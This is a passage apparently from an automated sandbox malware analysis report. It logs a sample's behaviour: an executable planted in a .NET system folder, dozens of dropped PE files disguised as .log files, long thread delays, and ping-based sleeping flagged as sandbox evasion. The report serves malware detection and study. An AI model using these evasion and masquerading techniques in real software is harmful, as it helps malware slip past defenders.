Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Memory allocated: D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 750000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1A560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 10A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1AA50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1AC80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1AC00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 14A0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 860000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1A530000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: F70000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1AE10000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 11A0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1AF20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 11F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Memory allocated: 1ABB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pLpTuJYH.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\apDEhkEl.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yuIieleo.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zuWaRqDn.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VnZQnlzb.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LCrhcYww.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KRjbfmWU.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BDesMBdT.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fXYUxCDX.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OzAXPueG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RfcHRSFf.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pGrkhfIF.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HPxsKDSZ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oxAuScwr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FTTrxXjd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cyaNQADQ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mvOMxtrw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NkPigQpK.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VjLFuzVH.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\waJkCVMY.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RdNoqiHi.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nzBVHGUq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vlAbNuev.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WTjyQsvs.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SKvXgoIi.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eReVdbbp.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IjLZavdG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MAAYLQkP.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dUDNIbMu.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eWtfXNEJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TLlpvaAw.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UkLxLBCd.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lmQBfErr.log	Jump to dropped file
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TzzXjEkC.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KZthgyKJ.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TADrPPcC.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GJcAmyRG.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zdFkvbcm.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gcAWdtGq.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\edjwtIzh.log	Jump to dropped file

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe TID: 7652	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 8024	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7936	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7260	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 2740	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 5684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 5264	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7628	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7736	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 3396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 7012	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 1532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 6048	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 5696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 3832	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe TID: 5312	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\w32tm.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe

Code function: 13_2_00007FFB4B4273B3 GetSystemInfo,

13_2_00007FFB4B4273B3

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
